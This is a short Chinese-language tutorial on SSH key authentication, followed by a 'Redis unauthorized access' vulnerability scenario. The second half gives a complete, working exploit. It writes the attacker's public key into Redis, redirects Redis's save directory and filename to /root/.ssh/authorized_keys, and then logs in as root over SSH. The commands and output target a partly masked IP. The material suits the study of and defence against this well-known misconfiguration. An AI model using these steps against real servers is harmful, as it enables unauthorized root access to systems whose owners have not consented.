密鑰認證機制

創建存放key的文件

1）創建目錄 /root/.ssh 並設置權限

[root@localhost ~]# mkdir /root/.ssh mkdir 命令用來創建目錄，以後會詳細介紹，暫時只了解即可。

[root@localhost ~]# chmod 700 /root/.ssh chmod 命令是用來修改文件屬性權限的，以後會詳細介紹。

2）創建文件 / root/.ssh/authorized_keys

[root@localhost ~]# vim /root/.ssh/authorized_keys

生成Key

Xshell-【新建用戶密鑰生成向導】，密鑰類型選擇RSA，密鑰長度選擇2048位，生成密鑰名稱，加密的密碼。

復制生成的公鑰到遠程linux裏面 /root/.ssh/authorized_keys 文件中。如果沒有.ssh目錄，就自行建立，並更改目錄權限為700。粘貼公鑰的內容，保存退出。

就可以利用密鑰登錄了

漏洞場景-redis未授權訪問漏洞

1）本地生成秘鑰

root@XXX:~# ssh-keygen  -t rsa

2）將公鑰寫入一個文件

root@XXX:~# cd /root/.ssh/

root@XXX:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

3）連接redis寫入文件

root@XXX:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit

OK
root@XXX:~/.ssh# redis-cli  -h 210.73.90.xxx

210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379> config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
root@XXX:~/.ssh# ssh

4）連接服務器
root@XXX:~/.ssh# ssh -i id_rsa [email protected]
 

使用密鑰認證機制遠程登錄Linux